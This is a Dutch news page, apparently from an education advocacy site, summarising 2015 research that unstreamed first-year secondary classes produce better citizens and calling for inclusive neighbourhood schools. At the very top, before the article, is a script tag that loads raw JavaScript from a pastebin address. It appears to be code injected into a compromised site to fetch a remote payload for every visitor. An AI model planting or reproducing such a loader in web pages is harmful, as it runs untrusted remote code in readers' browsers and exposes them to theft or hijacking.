<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


Brede brugklas levert betere burgers. 17 oktober 2015
In dagblad Trouw van 15 oktober wordt het resultaat van wetenschappelijk onderzoek gegheven dat een brede brugklas, dus zonder selectie naar vermeend niveau betere burgers oplevert. Hoewel alle leerlingen minder goed scoren op burgerschap, geldt dat het meest voor leerlingen uit zwakkere sociale milieus en met een lagere intelligentie. Zij lopen qua ontwikkeling van burgerschap in groep 8 al achter op klasgenootjes.zie http://www.trouw.nl/tr/nl/4556/Onderwijs/article/detail/4164213/2015/10/16/Brede-brugklas-levert-betere-burgers-op.dhtml Wetenschappelijk onderzoek heeft ook aangetoond dat diversiteit in niveau ook de cognitieve prestaties van alle kinderen bevordert, behalve misschien van de superbegaafden. Die laatste blijven op het zelfde niveau, maar worden dus wel democratischer.
Wat houdt ons nog tegen? Lokale overheid, neem de met sluiting bedreigde scholen weer over en begin brede inclusieve scholen waar elk kind uit de buurt, dus ook kinderen met handicap naar toe kan! en goed onderwijs krijgt! Onze leerkrachten zijn niet dommer dan de Scandinavische of Italiaanse. Ga de uitdaging aan!

<< Terug